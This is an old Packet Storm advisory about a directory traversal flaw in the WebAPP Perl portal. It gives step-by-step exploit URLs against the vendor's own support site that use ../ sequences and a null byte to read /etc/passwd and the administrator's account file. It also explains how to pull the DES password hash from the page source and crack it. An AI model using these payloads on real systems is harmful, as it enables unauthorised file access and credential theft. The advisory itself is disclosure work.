webapp.traversal.txt

2004-08-26T00:00:00
ID PACKETSTORM:34142
Type packetstorm
Reporter Packet Storm
Modified 2004-08-26T00:00:00

Description

                                        
                                            `  
  
  
WebAPP is advertised as the internet's most feature rich,  
easy to run PERL based portal system.  
Its home site is at http://www.web-app.org/  
Some features are :  
  
-Easy to Install on standard Unix servers!  
(Windows user-supported only!)  
-User Profiles  
-Message forums  
-Private messaging between members  
-Blog-style News Articles  
-Links and Downloads  
-Customizable themes  
-Multiple language support  
-Flat-file System-NO SQL DATABASE!  
-Membership controls  
-Open source  
  
Several user mods are also available which ranges from chat  
to e-commerce applications.  
  
Several vulnerabilities in these mods have already been  
discovered.   
  
  
  
The WebAPP system itself has a serious reverse directory  
traversal vulnerability.  
  
Example..  
  
1) Go to http://cornerstone.web-app.org/cgi-bin/index.cgi  
/this is their main support site/  
  
2) Click on Articles on the main menu at the left side of  
the screen  
  
3) Click on any of the icons representing the misc topics  
available /i chose the "bugs" section/  
  
4) You'll wind up with the url "http://cornerstone.web-app.org/cgi-bin/index.cgi?action=topics&viewcat=bugs"  
on the address bar on your browser. Change it to  
"http://cornerstone.web-app.org/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00"  
  
5)View the html source for the page  
  
  
  
A more interesting file to look at would be;  
"http://cornerstone.web-app.org/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00"  
  
View the html source code and scroll down until you come to  
the line with;  
href="index.cgi?action=viewnews&id=adUCOOzV2ljgg"></a></td>  
  
"adUCOOzV2ljgg" is the hashed password of the Administrator.  
It's standard DES encrypted so you can  
run a password cracking program to crack it  
  
Every user would have a corresponding .dat file within the  
db/members directory  
  
  
PhTeam Release  
  
Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,  
ch1m3ra, and sa mga posers na kupal sa #oneball  
  
  
  
  
  
Philweb Corporation FREEMAIL Services  
http://www.philwebinc.com  
`